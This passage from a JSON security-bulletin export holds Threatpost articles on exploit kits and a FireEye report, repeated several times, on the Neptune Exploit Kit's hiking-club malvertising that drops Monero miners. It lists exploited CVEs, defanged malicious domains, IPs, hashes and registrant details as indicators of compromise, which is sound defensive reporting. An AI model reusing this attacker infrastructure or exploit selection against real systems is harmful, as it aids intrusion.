Nuclear Pack Exploit Kit.\n\nArchie joins another exploit kit, Angler, in targeting Silverlight vulnerabilities. Silverlight, Microsoft\u2019s app framework, is perhaps best known for powering media streaming services like Netflix. [Java.com and TMZ.com](<http://threatpost.com/java-com-tmz-serving-malvertising-redirects-to-angler-exploit-kit/107943>) were found sending users to sites peddling Angler last month.\n", "cvss3": {}, "published": "2014-09-16T17:25:57", "type": "threatpost", "title": "Archie Exploit Kit Spotted Leveraging Adobe, Silverlight Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-0074", "CVE-2013-2551", "CVE-2014-0497", "CVE-2014-0515"], "modified": "2014-09-16T21:25:57", "id": "THREATPOST:9928E4032CF09647D7486B6AB9996982", "href": "https://threatpost.com/archie-exploit-kit-targets-adobe-silverlight-vulnerabilities/108317/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:23", "description": "A nasty Adobe Flash zero-day vulnerability that was remediated in an [emergency update in October 2015](<https://threatpost.com/emergency-adobe-flash-zero-day-patch-arrives-ahead-of-schedule/115073/>) was thereafter co-opted by seven exploit kits, according to an analysis published today by researchers at Recorded Future.\n\nThe Adobe vulnerability, CVE-2015-7645, was also used by the Russian APT group known as APT 28, which laced spear phishing emails with exploits targeting foreign affairs ministries worldwide. APT 28, also known as Sofacy, frequently targets NATO-allied political targets and in November was [singled out by Microsoft](<https://threatpost.com/microsoft-says-russian-apt-group-behind-zero-day-attacks/121722/>) for using separate Flash and Windows zero days in targeted attacks this year.\n\nThe Flash bug was among the first to be used after Adobe implemented new mitigations into the software to combat memory-based attacks. Despite the improvements in Flash security, attackers still take a shine to these exploits.\n\nRecorded Future\u2019s report \u201c[New Kit, Same Player](<https://www.recordedfuture.com/top-vulnerabilities-2016/>)\u201d says that six of the top 10 vulnerabilities used in exploit kits were Flash Player bugs, followed by Internet Explorer, Windows and Silverlight exploits. None of this year\u2019s top 10 vulnerabilities were present in a similar analysis done last year.\n\nExploit kits, meanwhile, have been reduced in prominence since the disappearance of a number of popular kits, including Angler and Nuclear. Angler, in particular, was particularly popular with criminals; it was updated frequently and sold in a number of underground forums. The June arrest of a Russian cybercrime outfit behind the Lurk Trojan, however, spelled the end of days for Angler. Researchers at Kaspersky Lab [confirmed the connection](<https://securelist.com/analysis/publications/75944/the-hunt-for-lurk/>) between the [Lurk gang and Angler](<https://threatpost.com/inside-the-demise-of-the-angler-exploit-kit/120222/>) distribution in an August report.\n\nNonetheless, exploit kits remain a threat and a vehicle for attacks that include ransomware, click fraud and adware. Victims are compromised in a number of ways, including drive-by attacks, malvertising or links in emails, all of which direct the victim\u2019s browser to the exploit kit\u2019s landing page. Code on the page determines the browser being used and launches the exploit mostly likely to hit paydirt.\n\nCVE-2015-7645 was found in Angler, as well as in Neutrino, Magnitude, RIG, Nuclear Pack, Spartan and Hunter. It, by far, had the highest penetration into exploits kits, according to Recorded Future.\n\nBut since Angler\u2019s demise earlier this year, Sundown has risen to a measure of prominence with its maintainers updating the kit often with new exploits. Sundown\u2019s payload, however, differs in that it drops banking Trojans on users\u2019 machines. Recorded Future said this kit also relies on domain shadowing more than its counterparts in order to register subdomains that are used to host attacks.\n\nSundown also contained CVE-2016-0189, an [Internet Explorer bug](<https://threatpost.com/patched-ie-zero-day-incorporated-into-neutrino-ek/119321/>) used in targeted attacks against South Korean organizations earlier this year. Microsoft patched it in July, but already it had been used by Neutrino as well. The IE bug, Recorded Future said, was the top flaw found in exploit kits, referenced more than 600 times. CVE-2016-1019 and CVE-2016-4117, two other Flash Player bugs, round out the top three. [CVE-2016-4117](<https://securelist.com/blog/research/75100/operation-daybreak/>) was used by the [ScarCruft APT group](<https://threatpost.com/scarcruft-apt-group-used-latest-flash-zero-day-in-two-dozen-attacks/118642/>), Kaspersky Lab researchers said in June, in watering hole attacks.\n", "cvss3": {}, "published": "2016-12-06T13:58:56", "type": "threatpost", "title": "Flash Exploit Found in Seven Exploit Kits", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-7645", "CVE-2016-0189", "CVE-2016-1019", "CVE-2016-4117"], "modified": "2016-12-07T14:36:02", "id": "THREATPOST:190D2D4CC706E0CF894B62979A2DA309", "href": "https://threatpost.com/flash-exploit-found-in-seven-exploit-kits/122284/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fireeye": [{"lastseen": "2021-11-04T00:25:01", "description": "Exploit kit (EK) activity has been on the decline ever since [Angler Exploit Kit was shut down](<https://securityintelligence.com/news/say-goodbye-to-the-angler-exploit-kit/>) in 2016. [Fewer people using Internet Explorer](<https://threatpost.com/exploit-kit-activity-quiets-but-is-far-from-silent/124461/>) and a [drop in browser support for Adobe Flash](<https://blog.mozilla.org/futurereleases/2016/07/20/reducing-adobe-flash-usage-in-firefox/>) \u2013 two primary targets of many exploit kits \u2013 have also contributed to this decline. Additionally, some popular redirect campaigns using [PseudoDarkleech and EITest Gate to Rig Exploit Kit](<http://www.darkreading.com/attacks-breaches/rig-exploit-kit-takedown-sheds-light-on-domain-shadowing/d/d-id/1329085>) were shut down in first half of this year.\n\nDespite all this, [malvertising campaigns involving exploits kits](<https://www.fireeye.com/blog/threat-research/2017/03/still_getting_served.html>) remain active. The Neptune Exploit Kit (or Terror EK), which initially started as a Sundown EK copycat operation, has relied heavily on malvertisements. Early use of this exploit kit saw domains with very similar patterns dropping cryptocurrency miners through malvertisements:\n\n * networkmarketingpro3[.]us\n * networkmarketingpro2[.]us\n * onlinesalesproaffiliate1[.]us\n * onlinesalesproaffiliate2[.]us\n * onlinesalesproaffiliate3[.]us\n * onlinesalesproaffiliate4[.]us\n * onlinesalesproaffiliate5[.]us\n * onlinesalesproaffiliate6[.]us\n\nPayloads spread by Neptune Exploit Kit have since diversified. Recently, we have seen changes in Neptune EK\u2019s URI patterns, landing pages, malvertisement campaigns and login account details associated with the cryptocurrency mining payloads. \n\n#### Propagation\n\nSince July 16, our Dynamic Threat Intelligence (DTI) has observed changes in URI patterns for Neptune Exploit Kit. At the time of writing, the new campaign abuses a legitimate popup ad service (within Alexa\u2019s top 100) with redirects to ads about hiking clubs, as shown in Figure 1.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Hiking%20malvertising/Fig1.png) \nFigure 1: Fake ad for a hiking club leading to Neptune EK\n\nRedirects from domains associated with these ads eventually use 302 redirects to move victims to exploit kit landing pages. Fake domains involved in these redirects imitate real domains. For example, highspirittreks[.]club shown in Figure 1 spoofs highspirittreks[.]com. Other hiking fake ads use similarly spoofed legitimate site names with .club domains. Figure 2 shows a redirect from a fake site\u2019s pop-up.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Hiking%20malvertising/Fig2.png) \nFigure 2: Silent redirect to EK landing page\n\nFireEye Dynamic Threat Intelligence (DTI) stats show the regions being affected by this campaign (Figure 3). \n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Hiking%20malvertising/Fig3b.png) \nFigure 3: Regions affected by the malvertisement campaign, as observed from customer data\n\nA few instances of the redirect involve flvto[.]download (mimicking the legitimate www.flvto[.]biz) instead of hiking club fake ads. Figure 4 and Figure 5 show the legitimate domain and fake domain, respectively, for comparison\u2019s sake.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Hiking%20malvertising/Fig4.png) \nFigure 4: Real page, flvto[.]biz (Alexa rank 2,674)\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Hiking%20malvertising/Fig5.png) \nFigure 5: Fake page, flvto[.]download\n\nMost of the ads linked to this campaign have been observed on high-traffic torrent and multimedia hosting sites.\n\nSites are hosted on IP **95.85.62.226**. Reverse lookup for this IP shows:\n\n * 2watchmygf[.]stream\n * flvto[.]download\n * highspirittreks[.]club\n * treknepal[.]club\n\nOther hosted IPs and domains of the same campaign are in the Indicators of Compromise section at the end of the post. All IPs point to locations in Amsterdam.\n\nSince July 16, related EK infrastructure has been hosted on domains protected by Whois Guard. However, in recent activity, domains are linked to the Registrant email: \u2018gabendollar399@gmx[.]com\u2019. \n\nThe following domains are currently associated with this email:\n\n**Domain Name**\n\n| \n\n**Create Date**\n\n| \n\n**Registrar** \n \n---|---|--- \n \n[itsmebecauseyoua[.]pw](<https://whois.domaintools.com/itsmebecauseyoua.pw>)\n\n| \n\n2017-03-05\n\n| \n\n\\-- \n \n[loansforevery[.]us](<https://whois.domaintools.com/loansforevery.us>)\n\n| \n\n2017-04-14\n\n| \n\n1 HOST RUSSIA, INC \n \n[managetheworld[.]us](<https://whois.domaintools.com/managetheworld.us>)\n\n| \n\n2017-04-14\n\n| \n\n1 HOST RUSSIA, INC \n \n[nudecams[.]us](<https://whois.domaintools.com/nudecams.us>)\n\n| \n\n2017-04-14\n\n| \n\n1 HOST RUSSIA, INC \n \n#### Exploits/Landing Page\n\nThe landing page for the Neptune Exploit Kit redirects to further HTML and Adobe Flash exploit links after it checks the Flash versions installed on the victim\u2019s machine (see Figure 6).\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Hiking%20malvertising/Fig6.PNG) \nFigure 6: Landing page of Neptune EK\n\nThis EK exploits multiple vulnerabilities in one run. Most of these exploits are well-known and commonly seen in other exploit kits.\n\nCurrently, Neptune EK uses three Internet Explorer exploits and two Flash exploits:\n\n * [CVE-2016-0189](<https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html>) \u2013 Internet Explorer\n * [CVE-2015-2419](<https://www.fireeye.com/blog/threat-research/2015/08/cve-2015-2419_inte.html>) \u2013 Internet Explorer\n * [CVE-2014-6332](<https://technet.microsoft.com/en-us/library/security/ms14-064.aspx>) \u2013 Internet Explorer\n * [CVE-2015-8651](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8651>) \u2013 Adobe Flash Player\n * [CVE-2015-7645](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7645>) \u2013 Adobe Flash Player\n\n#### Payload (Monero miner)\n\nThe payload is dropped as a plain executable from one of the URI\u2019s belonging to the EK domain (same as the landing page). Figure 7 shows a typical response header for these cases.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Hiking%20malvertising/Fig7.png) \nFigure 7: Response header for Monero miner payload\n\nPost infection traffic shows an attempt to connect to minergate[.]com (Figure 8) and a login attempt using the cpu-miner service via the login email monsterkill20@mail[.]com (Figure 9). Login attempts are invoked via the command line:\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Hiking%20malvertising/Command%20Line%201.png)\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Hiking%20malvertising/Fig8.png) \nFigure 8: DNS query to minergate[.]com\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Hiking%20malvertising/Fig9.png) \nFigure 9: Login attempt\n\n#### Conclusion\n\nDespite an observable decline in exploit kit activity, users are still at risk, especially if they have outdated or unpatched software. This threat is especially dangerous considering drive-by exploit kits (such as Neptune EK) can use malvertisements to seamlessly download payloads without ever alerting of the user.\n\nFireEye NX [detects exploit kit infection attempts](<https://www.fireeye.com/products/nx-network-security-products.html>) before the malware payload is downloaded to the user\u2019s machine. Additionally, malware payloads dropped by exploit kits are detected in all other FireEye products.\n\n#### Indicators of Compromise\n\n##### Malvertisement domains:\n\n * hxxp://treknepal[.]club/\n * hxxp://highspirittrecks[.]club\n * hxxp://advnepaltrekking[.]club\n * hxxp://nepalyogatrek[.]club\n * hxxp://flvto[.]download\n\n##### Malvertisement IPs:\n\n * 95.85.62.226\n * 185.82.202.36\n\n##### EK domains (current active) registrant:\n\nDomain Name: MANAGETHEWORLD.US \nDomain ID: D59392852-US \nSponsoring Registrar: NAMECHEAP, INC. \nSponsoring Registrar IANA ID: 1068 \nRegistrar URL (registration services): http://www.namecheap[.]com \nDomain Status: clientTransferProhibited \nRegistrant ID: NLGUS4BVD3M2DN2Y \nRegistrant Name: kreb son \nRegistrant Address1: Maker 541 \nRegistrant City: Navada \nRegistrant State/Province: SA \nRegistrant Postal Code: 546451 \nRegistrant Country: Bulgaria \nRegistrant Country Code: BG \nRegistrant Phone Number: +44.45623417852 \nRegistrant Email: gabendollar399@gmx[.]com \nRegistrant Application Purpose: P1 \nRegistrant Nexus Category: C11 \nAdministrative Contact ID: VNM50NNJ5Y0VNLDY \nAdministrative Contact Name: kreb son \nAdministrative Contact Address1: Maker 541 \nAdministrative Contact City: Navada \nAdministrative Contact State/Province: SA \nAdministrative Contact Postal Code: 546451 \nAdministrative Contact Country: Bulgaria \nAdministrative Contact Country Code: BG \nAdministrative Contact Phone Number: +44.45623417852 \nAdministrative Contact Email: gabendollar399@gmx[.]com\n\n##### Sample EK URI Pattern:\n\nforum_jVpbUAr/showthread.php?id=xxxxxxx\n\n##### Sample MD5s:\n\nb678ac0b870b78060a2a9f599000302d \n5a18c92e148bbd7f10077f8e7431326e\n\n#### Acknowledgement\n\nWe would like to thanks Hassan Faizan for his contributions to this discovery.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-22T14:00:00", "type": "fireeye", "title": "Hiking Club Malvertisements Drop Monero Miners Via Neptune Exploit Kit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332", "CVE-2015-2419", "CVE-2015-7645", "CVE-2015-8651", "CVE-2016-0189"], "modified": "2017-08-22T14:00:00", "id": "FIREEYE:2B54485AD5D7B8DCC55F5A6BE1F3DBD6", "href": "https://www.fireeye.com/blog/threat-research/2017/08/neptune-exploit-kit-malvertising.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-09-12T20:44:52", "description": "Exploit kit (EK) activity has been on the decline ever since [Angler Exploit Kit was shut down](<https://securityintelligence.com/news/say-goodbye-to-the-angler-exploit-kit/>) in 2016. [Fewer people using Internet Explorer](<https://threatpost.com/exploit-kit-activity-quiets-but-is-far-from-silent/124461/>) and a [drop in browser support for Adobe Flash](<https://blog.mozilla.org/futurereleases/2016/07/20/reducing-adobe-flash-usage-in-firefox/>) \u2013 two primary targets of many exploit kits \u2013 have also contributed to this decline. Additionally, some popular redirect campaigns using [PseudoDarkleech and EITest Gate to Rig Exploit Kit](<http://www.darkreading.com/attacks-breaches/rig-exploit-kit-takedown-sheds-light-on-domain-shadowing/d/d-id/1329085>) were shut down in first half of this year.\n\nDespite all this, [malvertising campaigns involving exploits kits](<https://www.fireeye.com/blog/threat-research/2017/03/still_getting_served.html>) remain active. The Neptune Exploit Kit (or Terror EK), which initially started as a Sundown EK copycat operation, has relied heavily on malvertisements. Early use of this exploit kit saw domains with very similar patterns dropping cryptocurrency miners through malvertisements:\n\n * networkmarketingpro3[.]us\n * networkmarketingpro2[.]us\n * onlinesalesproaffiliate1[.]us\n * onlinesalesproaffiliate2[.]us\n * onlinesalesproaffiliate3[.]us\n * onlinesalesproaffiliate4[.]us\n * onlinesalesproaffiliate5[.]us\n * onlinesalesproaffiliate6[.]us\n\nPayloads spread by Neptune Exploit Kit have since diversified. Recently, we have seen changes in Neptune EK\u2019s URI patterns, landing pages, malvertisement campaigns and login account details associated with the cryptocurrency mining payloads. \n\n#### Propagation\n\nSince July 16, our Dynamic Threat Intelligence (DTI) has observed changes in URI patterns for Neptune Exploit Kit. At the time of writing, the new campaign abuses a legitimate popup ad service (within Alexa\u2019s top 100) with redirects to ads about hiking clubs, as shown in Figure 1.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Hiking%20malvertising/Fig1.png) \nFigure 1: Fake ad for a hiking club leading to Neptune EK\n\nRedirects from domains associated with these ads eventually use 302 redirects to move victims to exploit kit landing pages. Fake domains involved in these redirects imitate real domains. For example, highspirittreks[.]club shown in Figure 1 spoofs highspirittreks[.]com. Other hiking fake ads use similarly spoofed legitimate site names with .club domains. Figure 2 shows a redirect from a fake site\u2019s pop-up.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Hiking%20malvertising/Fig2.png) \nFigure 2: Silent redirect to EK landing page\n\nFireEye Dynamic Threat Intelligence (DTI) stats show the regions being affected by this campaign (Figure 3). \n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Hiking%20malvertising/Fig3b.png) \nFigure 3: Regions affected by the malvertisement campaign, as observed from customer data\n\nA few instances of the redirect involve flvto[.]download (mimicking the legitimate www.flvto[.]biz) instead of hiking club fake ads. Figure 4 and Figure 5 show the legitimate domain and fake domain, respectively, for comparison\u2019s sake.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Hiking%20malvertising/Fig4.png) \nFigure 4: Real page, flvto[.]biz (Alexa rank 2,674)\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Hiking%20malvertising/Fig5.png) \nFigure 5: Fake page, flvto[.]download\n\nMost of the ads linked to this campaign have been observed on high-traffic torrent and multimedia hosting sites.\n\nSites are hosted on IP **95.85.62.226**. Reverse lookup for this IP shows:\n\n * 2watchmygf[.]stream\n * flvto[.]download\n * highspirittreks[.]club\n * treknepal[.]club\n\nOther hosted IPs and domains of the same campaign are in the Indicators of Compromise section at the end of the post. All IPs point to locations in Amsterdam.\n\nSince July 16, related EK infrastructure has been hosted on domains protected by Whois Guard. However, in recent activity, domains are linked to the Registrant email: \u2018gabendollar399@gmx[.]com\u2019. \n\nThe following domains are currently associated with this email:\n\n**Domain Name**\n\n| \n\n**Create Date**\n\n| \n\n**Registrar** \n \n---|---|--- \n \n[itsmebecauseyoua[.]pw](<https://whois.domaintools.com/itsmebecauseyoua.pw>)\n\n| \n\n2017-03-05\n\n| \n\n\\-- \n \n[loansforevery[.]us](<https://whois.domaintools.com/loansforevery.us>)\n\n| \n\n2017-04-14\n\n| \n\n1 HOST RUSSIA, INC \n \n[managetheworld[.]us](<https://whois.domaintools.com/managetheworld.us>)\n\n| \n\n2017-04-14\n\n| \n\n1 HOST RUSSIA, INC \n \n[nudecams[.]us](<https://whois.domaintools.com/nudecams.us>)\n\n| \n\n2017-04-14\n\n| \n\n1 HOST RUSSIA, INC \n \n#### Exploits/Landing Page\n\nThe landing page for the Neptune Exploit Kit redirects to further HTML and Adobe Flash exploit links after it checks the Flash versions installed on the victim\u2019s machine (see Figure 6).\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Hiking%20malvertising/Fig6.PNG) \nFigure 6: Landing page of Neptune EK\n\nThis EK exploits multiple vulnerabilities in one run. Most of these exploits are well-known and commonly seen in other exploit kits.\n\nCurrently, Neptune EK uses three Internet Explorer exploits and two Flash exploits:\n\n * [CVE-2016-0189](<https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html>) \u2013 Internet Explorer\n * [CVE-2015-2419](<https://www.fireeye.com/blog/threat-research/2015/08/cve-2015-2419_inte.html>) \u2013 Internet Explorer\n * [CVE-2014-6332](<https://technet.microsoft.com/en-us/library/security/ms14-064.aspx>) \u2013 Internet Explorer\n * [CVE-2015-8651](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8651>) \u2013 Adobe Flash Player\n * [CVE-2015-7645](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7645>) \u2013 Adobe Flash Player\n\n#### Payload (Monero miner)\n\nThe payload is dropped as a plain executable from one of the URI\u2019s belonging to the EK domain (same as the landing page). Figure 7 shows a typical response header for these cases.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Hiking%20malvertising/Fig7.png) \nFigure 7: Response header for Monero miner payload\n\nPost infection traffic shows an attempt to connect to minergate[.]com (Figure 8) and a login attempt using the cpu-miner service via the login email monsterkill20@mail[.]com (Figure 9). Login attempts are invoked via the command line:\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Hiking%20malvertising/Command%20Line%201.png)\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Hiking%20malvertising/Fig8.png) \nFigure 8: DNS query to minergate[.]com\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Hiking%20malvertising/Fig9.png) \nFigure 9: Login attempt\n\n#### Conclusion\n\nDespite an observable decline in exploit kit activity, users are still at risk, especially if they have outdated or unpatched software. This threat is especially dangerous considering drive-by exploit kits (such as Neptune EK) can use malvertisements to seamlessly download payloads without ever alerting of the user.\n\nFireEye NX [detects exploit kit infection attempts](<https://www.fireeye.com/products/nx-network-security-products.html>) before the malware payload is downloaded to the user\u2019s machine. Additionally, malware payloads dropped by exploit kits are detected in all other FireEye products.\n\n#### Indicators of Compromise\n\n##### Malvertisement domains:\n\n * hxxp://treknepal[.]club/\n * hxxp://highspirittrecks[.]club\n * hxxp://advnepaltrekking[.]club\n * hxxp://nepalyogatrek[.]club\n * hxxp://flvto[.]download\n\n##### Malvertisement IPs:\n\n * 95.85.62.226\n * 185.82.202.36\n\n##### EK domains (current active) registrant:\n\nDomain Name: MANAGETHEWORLD.US \nDomain ID: D59392852-US \nSponsoring Registrar: NAMECHEAP, INC. \nSponsoring Registrar IANA ID: 1068 \nRegistrar URL (registration services): http://www.namecheap[.]com \nDomain Status: clientTransferProhibited \nRegistrant ID: NLGUS4BVD3M2DN2Y \nRegistrant Name: kreb son \nRegistrant Address1: Maker 541 \nRegistrant City: Navada \nRegistrant State/Province: SA \nRegistrant Postal Code: 546451 \nRegistrant Country: Bulgaria \nRegistrant Country Code: BG \nRegistrant Phone Number: +44.45623417852 \nRegistrant Email: gabendollar399@gmx[.]com \nRegistrant Application Purpose: P1 \nRegistrant Nexus Category: C11 \nAdministrative Contact ID: VNM50NNJ5Y0VNLDY \nAdministrative Contact Name: kreb son \nAdministrative Contact Address1: Maker 541 \nAdministrative Contact City: Navada \nAdministrative Contact State/Province: SA \nAdministrative Contact Postal Code: 546451 \nAdministrative Contact Country: Bulgaria \nAdministrative Contact Country Code: BG \nAdministrative Contact Phone Number: +44.45623417852 \nAdministrative Contact Email: gabendollar399@gmx[.]com\n\n##### Sample EK URI Pattern:\n\nforum_jVpbUAr/showthread.php?id=xxxxxxx\n\n##### Sample MD5s:\n\nb678ac0b870b78060a2a9f599000302d \n5a18c92e148bbd7f10077f8e7431326e\n\n#### Acknowledgement\n\nWe would like to thanks Hassan Faizan for his contributions to this discovery.\n", "edition": 2, "cvss3": {}, "published": "2017-08-22T10:00:00", "type": "fireeye", "title": "Hiking Club Malvertisements Drop Monero Miners Via Neptune Exploit Kit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332", "CVE-2016-0189", "CVE-2015-8651", "CVE-2015-2419", "CVE-2015-7645"], "modified": "2017-08-22T10:00:00", "id": "FIREEYE:0CAA37548C7EBA899FA1174794304489", "href": "https://www.fireeye.com/blog/threat-research/2017/08/neptune-exploit-kit-malvertising.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:18:22", "description": "Exploit kit (EK) activity has been on the decline ever since [Angler Exploit Kit was shut down](<https://securityintelligence.com/news/say-goodbye-to-the-angler-exploit-kit/>) in 2016. [Fewer people using Internet Explorer](<https://threatpost.com/exploit-kit-activity-quiets-but-is-far-from-silent/124461/>) and a [drop in browser support for Adobe Flash](<https://blog.mozilla.org/futurereleases/2016/07/20/reducing-adobe-flash-usage-in-firefox/>) \u2013 two primary targets of many exploit kits \u2013 have also contributed to this decline. Additionally, some popular redirect campaigns using [PseudoDarkleech and EITest Gate to Rig Exploit Kit](<http://www.darkreading.com/attacks-breaches/rig-exploit-kit-takedown-sheds-light-on-domain-shadowing/d/d-id/1329085>) were shut down in first half of this year.\n\nDespite all this, [malvertising campaigns involving exploits kits](<https://www.fireeye.com/blog/threat-research/2017/03/still_getting_served.html>) remain active. The Neptune Exploit Kit (or Terror EK), which initially started as a Sundown EK copycat operation, has relied heavily on malvertisements. Early use of this exploit kit saw domains with very similar patterns dropping cryptocurrency miners through malvertisements:\n\n * networkmarketingpro3[.]us\n * networkmarketingpro2[.]us\n * onlinesalesproaffiliate1[.]us\n * onlinesalesproaffiliate2[.]us\n * onlinesalesproaffiliate3[.]us\n * onlinesalesproaffiliate4[.]us\n * onlinesalesproaffiliate5[.]us\n * onlinesalesproaffiliate6[.]us\n\nPayloads spread by Neptune Exploit Kit have since diversified. Recently, we have seen changes in Neptune EK\u2019s URI patterns, landing pages, malvertisement campaigns and login account details associated with the cryptocurrency mining payloads. \n\n#### Propagation\n\nSince July 16, our Dynamic Threat Intelligence (DTI) has observed changes in URI patterns for Neptune Exploit Kit. At the time of writing, the new campaign abuses a legitimate popup ad service (within Alexa\u2019s top 100) with redirects to ads about hiking clubs, as shown in Figure 1.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Hiking%20malvertising/Fig1.png) \nFigure 1: Fake ad for a hiking club leading to Neptune EK\n\nRedirects from domains associated with these ads eventually use 302 redirects to move victims to exploit kit landing pages. Fake domains involved in these redirects imitate real domains. For example, highspirittreks[.]club shown in Figure 1 spoofs highspirittreks[.]com. Other hiking fake ads use similarly spoofed legitimate site names with .club domains. Figure 2 shows a redirect from a fake site\u2019s pop-up.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Hiking%20malvertising/Fig2.png) \nFigure 2: Silent redirect to EK landing page\n\nFireEye Dynamic Threat Intelligence (DTI) stats show the regions being affected by this campaign (Figure 3). \n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Hiking%20malvertising/Fig3b.png) \nFigure 3: Regions affected by the malvertisement campaign, as observed from customer data\n\nA few instances of the redirect involve flvto[.]download (mimicking the legitimate www.flvto[.]biz) instead of hiking club fake ads. Figure 4 and Figure 5 show the legitimate domain and fake domain, respectively, for comparison\u2019s sake.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Hiking%20malvertising/Fig4.png) \nFigure 4: Real page, flvto[.]biz (Alexa rank 2,674)\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Hiking%20malvertising/Fig5.png) \nFigure 5: Fake page, flvto[.]download\n\nMost of the ads linked to this campaign have been observed on high-traffic torrent and multimedia hosting sites.\n\nSites are hosted on IP **95.85.62.226**. Reverse lookup for this IP shows:\n\n * 2watchmygf[.]stream\n * flvto[.]download\n * highspirittreks[.]club\n * treknepal[.]club\n\nOther hosted IPs and domains of the same campaign are in the Indicators of Compromise section at the end of the post. All IPs point to locations in Amsterdam.\n\nSince July 16, related EK infrastructure has been hosted on domains protected by Whois Guard. However, in recent activity, domains are linked to the Registrant email: \u2018gabendollar399@gmx[.]com\u2019. \n\nThe following domains are currently associated with this email:\n\n**Domain Name**\n\n| \n\n**Create Date**\n\n| \n\n**Registrar** \n \n---|---|--- \n \n[itsmebecauseyoua[.]pw](<https://whois.domaintools.com/itsmebecauseyoua.pw>)\n\n| \n\n2017-03-05\n\n| \n\n\\-- \n \n[loansforevery[.]us](<https://whois.domaintools.com/loansforevery.us>)\n\n| \n\n2017-04-14\n\n| \n\n1 HOST RUSSIA, INC \n \n[managetheworld[.]us](<https://whois.domaintools.com/managetheworld.us>)\n\n| \n\n2017-04-14\n\n| \n\n1 HOST RUSSIA, INC \n \n[nudecams[.]us](<https://whois.domaintools.com/nudecams.us>)\n\n| \n\n2017-04-14\n\n| \n\n1 HOST RUSSIA, INC \n \n#### Exploits/Landing Page\n\nThe landing page for the Neptune Exploit Kit redirects to further HTML and Adobe Flash exploit links after it checks the Flash versions installed on the victim\u2019s machine (see Figure 6).\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Hiking%20malvertising/Fig6.PNG) \nFigure 6: Landing page of Neptune EK\n\nThis EK exploits multiple vulnerabilities in one run. Most of these exploits are well-known and commonly seen in other exploit kits.\n\nCurrently, Neptune EK uses three Internet Explorer exploits and two Flash exploits:\n\n * [CVE-2016-0189](<https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html>) \u2013 Internet Explorer\n * [CVE-2015-2419](<https://www.fireeye.com/blog/threat-research/2015/08/cve-2015-2419_inte.html>) \u2013 Internet Explorer\n * 